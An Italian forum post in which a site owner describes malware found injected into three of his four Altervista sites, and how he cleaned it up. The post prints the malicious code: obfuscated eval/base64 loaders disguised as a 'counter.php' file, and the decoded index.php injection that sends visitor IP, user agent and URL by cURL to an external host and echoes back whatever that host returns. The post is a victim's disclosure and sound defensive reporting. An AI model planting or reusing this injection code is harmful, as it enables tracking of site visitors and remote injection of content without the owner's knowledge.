Trovato malware nei miei siti

[Luffio]

Ciao a tutti. Non so se è successo anche a qualcun altro, ma ho fatto una ricerca sul forum e non ho trovato niente al riguardo. Io me ne sono accorto solo in questi giorni ma il problema era sicuramente lì da mesi, quindi se sto dicendo una cosa vecchia vi chiedo scusa.

Qualche giorno fa, ho visitato il mio sito http://ageonline.altervista.org/ nel quale non entravo da molto tempo (anche perché non era più utilizzato da nessuno) e ho scoperto che Firefox me l'aveva flaggato come "non sicuro", allora ho controllato la pagina di diagnostica di Google, che non mi è stata di molto aiuto...
Quindi ho scartabellato i file del sito e ho scoperto un file che non avevo creato io, nominato "counter.php", che un codice del genere:

Codice PHP:

<?php
//Counter V.2.35
//Generated by server
//Do not delete
eval(gzuncompress(base64_decode('eF6lUsFqwkAU**CENSORED**5zYAhYFkwKEG2SwoRdmgibeIXh5AxE9+BR'))); ?><? eval(gzuncompress(base64_decode('eF5Vj9tqg0AQ**CENSORED**hJqhzbTlWhSDFGymw4dOP9c/v836bFU='))); ?><? eval(gzuncompress(base64_decode('eF6FlG1rgzAQ**CENSORED**734STlepajSSgxVquofilhu0g=='))); ?>

Decodificandolo, ho scoperto che eseguiva delle interazioni cURL verso un sito esterno, fornendo dati di navigazione sugli utenti come indirizzo IP, user agent eccetera (variabile $_SERVER). [Mi pare di aver capito che su Altervista interazioni di questo genere siano bloccate, quindi nessun utente dovrebbe essere stato preso di mira, giusto?]
Ho fatto una ricerca su Internet al riguardo e ho trovato una spiegazione dettagliata del malware in questa pagina: tra le altre cose, nel paragrafo "The infection" è riportata la decodifica del codice che ho qui sopra riportato.

Continuando la ricerca tra i file, ho notato anche che è apparso nel mio "index.php" questo codice:

Codice PHP:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c**CENSORED**3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

che è la versione non codificata del primo codice.
Ho eliminato i codici e ho inviato a Google la richiesta di rianalizzare il sito, che al momento in cui scrivo è ancora in atto. [EDIT: Google mi ha trovato un altro pezzo di script in due file .htm, ho ri-mandato di nuovo la richiesta di ri-controllo a Google, sono di nuovo in attesa.]

Poi, "per fare 31", ho controllato anche gli altri miei siti e ho trovato la stessa identica situazione, per un totale di 3 siti su 4 infettati, con la differenza che gli altri siti non erano stati flaggati come non sicuri (ed è anche per questo che non me n'ero accorto subito).